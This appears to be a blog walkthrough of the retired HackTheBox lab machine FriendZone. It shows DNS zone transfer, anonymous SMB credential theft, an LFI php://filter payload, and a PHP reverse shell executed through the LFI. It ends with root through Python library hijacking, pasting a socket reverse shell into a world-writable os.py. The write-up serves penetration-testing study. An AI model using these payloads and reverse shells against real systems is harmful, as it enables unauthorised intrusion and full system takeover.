FriendZone HackTheBox WalkThrough
This is FriendZone HackTheBox machine walkthrough and is also the
25th machine of our
OSCP like HTB Boxes series. In this writeup I have demonstrated step-by-step how I rooted to FriendZone HackTheBox machine. But, before diving into the hacking part let us know something about this box. It is a
Linux OS machine with IP address
10.10.10.123 and difficulty
easy assigned by its maker.
Since this machine is retired so you will require VIP subscription at
hackthebox.eu to access this machine. So first of all connect your Kali/Parrot machine with
HackTheBox VPN and confirm your connectivity with this machine by pinging its IP 10.10.10.123. If all goes correct then start hacking.
As usual I started by scanning the machine with Nmap.
Scanning gives us some idea how we have to proceed further like it helps to find open and closed ports and gives us information of different services running over them. I have used Nmap for this task and the result is given below:-
$ sudo nmap -sC -sV -sT -oA nmap/friendzone 10.10.10.123
Nmap found ports 21, 22, 53, 80, 139, 443 and 445.
VsFTPd on port
OpenSSH on port
DNS on port
Apache2 on port
SMB on port
SSL on port
443 are running. We have a lot of services to enumerate on. We will start by searching exploits for each version of software shown by nmap.
Searchsploit (an offline tool to query exploit-db.com) did not find any relevant exploit for available software. Perhaps, all the software were up to date when the machine was released. We will have to find some other attack vector using which we can get into the machine.
21 is open so
anonymous login is the first thing which everyone should check whenever he scan the machine. I tried login with
anonymous, but anonymous login is not allowed. Moving on port
22, we will try to test login into SSH when we get some credential. For now since there is no any credential available so I moved forward for enumeration on port no
URL http://10.10.10.123/ revealed an email address
[email protected]. The extracted domain from it is
friendzoneportal.red. Also nmap script
ssl-cert revealed a domain
friendzone.red. There is also another domain
friendzone.htb which I used to add. In case, if virtual host routing is enabled we would get some other website to enumerate on. So right now we have three domains let us add them to our
hosts file which is located in
Host File after Modification
$ cat /etc/hosts
https://friendzone.htb/ — Not found
https://friendzoneportal.red/ — Watching you image
https://friendzone.red/ — Ready to escape from FriendZone
We have DNS service running over
port 53 and we also have 3 virtual hosts let us check whether
DNS Zone transfer on our local machine is possible or not. When I tried to perform DNS Zone transfer it allowed me to transfer the zone files on my local machine.
Performing DNS Zone Transfer
$dig @10.10.10.123 friendzoneportal.red axfr
$ dig @10.10.10.123 friendzone.red axfr
DNS zone transfer found some more domains. They are
uploads.friendzone.red. We have total of 14 new URLs to check. 7 for
http and 7 for
https. Before accessing them let us add them to our hosts file in the directory
Host File after Modification
$ cat /etc/hosts
Enumeration on Port 80 & 443
All the http URLs have the same pages and many https URLs are dead. I have remarked each URLs below.
http://admin.friendzoneportal.red — Same as initial home page
https://admin.friendzoneportal.red — login-page
http://files.friendzoneportal.red — Same as initial home page
https://files.friendzoneportal.red — Not Found
http://imports.friendzoneportal.red — Same as initial home page
https://imports.friendzoneportal.red — Not Found
http://vpn.friendzoneportal.red — Same as initial home page
https://vpn.friendzoneportal.red — Not Found
http://administrator1.friendzone.red — Same as initial home page
https://administrator1.friendzone.red — Admin Login Page
http://hr.friendzone.red — Same as initial home page
https://hr.friendzone.red — Not Found
http://uploads.friendzone.red — Same as initial home page
https://uploads.friendzone.red — File Upload Options
All the http URLs are useless for now because all have the same page. We will enumerate on them if we will not get anything interesting from https URLs. For now we will focus more on https://admin.friendzoneportal.red & https://administrator1.friendzone.red because they have login pages and we can test a lot of vulnerabilities over them and also https://uploads.friendzone.red for testing
file upload vulnerability. Moving on https://admin.friendzoneportal.red first.
When I tried to login with any credential it gave message “
Admin page is not developed yet!!! check for another one”. This line hints us that there is some other admin login page available.
After going to https://administrator1.friendzone.red found another admin login page. Tried some basic injection like SQL and others but nothing worked. We requires a valid credential to login into it. We will return to this page when we get some credential.
For now let us go to https://uploads.friendzone.red to see what is present. File upload is allowed through it. Even we can upload
webshell through it there is no restriction present. But the problem is, we can’t access our uploaded files. For this we requires some
directory listing or
LFI type vulnerability. Till now both of them are not present.
Enumeration on Port 445
We have port 445 open let us check whether
null session is allowed or not.
$ smbmap -H 10.10.10.123 -R --depth 5
Null session is allowed and we have access to a file
\general\ folder. Let us download it using
$ smbclient //10.10.10.123/general
smb: > get creds.txt
smb: > exit
$ cat creds.txt
creds.txt contains credential of user admin.
After login using this credential at https://administrator1.friendzone.red/login.php told to visit
After going to URL https://administrator1.friendzone.red/dashboard.php listed some parameters
image_id=a.jpg&pagename=timestamp. Next thing I tried to explore my uploaded file with the timestamp which I got after successful file upload but it gave me error.
On spending some more time and doing some enumeration on this URL I found LFI vulnerability. This can be confirmed with the below URL. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=login. We can get
source-code of login page from above URL.
$ echo -n "PD9waHAKCgokdXNlcm5hbWUgPSAkX1BPU1RbInVzZXJuYW1lIl07CiRwYXNzd29yZCA9ICRfUE9TVFsicGFzc3dvcmQiXTsKCi8vZWNobyAkdXNlcm5hbWUgPT09ICJhZG1pbiI7Ci8vZWNobyBzdHJjbXAoJHVzZXJuYW1lLCJhZG1pbiIpOwoKaWYgKCR1c2VybmFtZT09PSJhZG1pbiIgYW5kICRwYXNzd29yZD09PSJXT1JLV09SS0hoYWxsZWx1amFoQCMiKXsKCnNldGNvb2tpZSgiRnJpZW5kWm9uZUF1dGgiLCAiZTc3NDlkMGY0YjRkYTVkMDNlNmU5MTk2ZmQxZDE4ZjEiLCB0aW1lKCkgKyAoODY0MDAgKiAzMCkpOyAvLyA4NjQwMCA9IDEgZGF5CgplY2hvICJMb2dpbiBEb25lICEgdmlzaXQgL2Rhc2hib2FyZC5waHAiOwp9ZWxzZXsKZWNobyAiV3JvbmcgISI7Cn0KCgoKPz4K" | base64 -d
After lot of enumeration I could not find my uploaded webshell. From the result of above
$ smbmap -H 10.10.10.123 -R --depth 5, we found Samba Server Files is stored in directory
/etc/Files/ and anonymous user also have write permission at
So according to above result our actual file path on the disk should be
/etc/Files/Development/shell but after uploading the shell in
Development folder through
$smbclient, it is accessible at
/etc/Development/shell. This may be due to reason that admin has changed the default directory. The uploaded shell can be executed at URL https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell (no .php extension is present in shell file because .php extension is truncated from all the php files).
Testing For File Upload
Let us upload a simple php script to check whether we can execute it or not.
$ echo "<?php echo \"This is test php file\" ?>" > test.php
$ cat test.php
$ smbclient //10.10.10.123/Development
smb: \> put test.php
smb: \> exit
The uploaded file can be accessed at https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test
Getting User Shell
Now we have confirmed file upload vulnerability let us upload our webshell to get user shell on our Kali machine.
$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php
$ vi shell.php # change to your tun0 IP
$ cat shell.php | grep -A8 -i 10.10.14.12
$ smbclient //10.10.10.123/Development
smb: \>put shell.php
smb: \> exit
Access this URL to execute the shell. https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/test. But before accessing it start netcat listener on your terminal.
$ nc -nvlp 1234
$ whoami && id
We have got user shell let us upgrade it to fully qualified Linux shell so that we can execute more advanced Linux command though it.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm
After some enumeration found file
mysql_data.conf which contains
SSH credential of user
friend. The file is present in the directory
$ cat /var/www/mysql_data.conf
The credential is
Let us login to user friend and capture user flag.
SSH into User Friend
$ ssh [email protected]
$ whoami && id
Capture User Flag
$ cat user.txt
To escalate privilege to root we have to first find a privilege escalation vector using which we perform privilege escalation. You can run some privilege escalation enumeration script like Linpeas and LinEnum to do this job or enumerate manually. I tried to use Linpeas but it could not found the PrivEsc vector. So I have to manually enumerate and find PrivEsc vector.
Finding PrivEsc Vector
After some enumeration found a file
reporter.py inside the directory
$ cat /opt/server_admin/reporter.py
Meanwhile, I ran pspy (a process monitoring tool) to
monitor processes running on the remote machine. It reported
reporter.py is being executed at interval of every 2 min by root. If we have
write permission to change the content of this file we would definitely get root shell. But normal user has not given write permission as you can see in the screenshot.
to be noted in above script is that it is
importing OS module in the script. If we have permission to introduce our reverse shell code in
os.py file then our reverse shell code will definitely be executed with root permission when
reporter.py file executes and we will get reverse shell on our netcat listener.
$ ls -la /opt/server_admin/reporter.py
Let us check the permission of os.py.
$ locate os.py
$ ls -la /usr/lib/python2.7/os.py
os.py is given write permission from the root user to every other users. So here we can make our reverse shell code be executed by root by introducing in os.py file. When I did this I got reverse shell with root privilege very easily. So here our PrivEsc vector is
Privilege Escalation using Python Library Hijacking. For more info on python library hijacking check this blog. See HTB box writeup with same privilege escalation vector here.
Getting Root Shell
To get root shell start netcat listener in one window and paste the following reverse shell code in the os.py file by changing the IP and save it. After that wait for 2 min to get the shell.
import pty import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.10.14.7",9001)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) pty.spawn("/bin/bash") s.close()
$ nano /usr/lib/python2.7/os.py
$ tail -13 /usr/lib/python2.7/os.py
$ nc -nvlp 9001
# whoami && id
We have got root shell. Let us capture root flag.
Capture Root Flag
$ cat root.txt
This was how I rooted to the FriendZone HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. For any query and suggestion about the writeup feel free to write us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com/.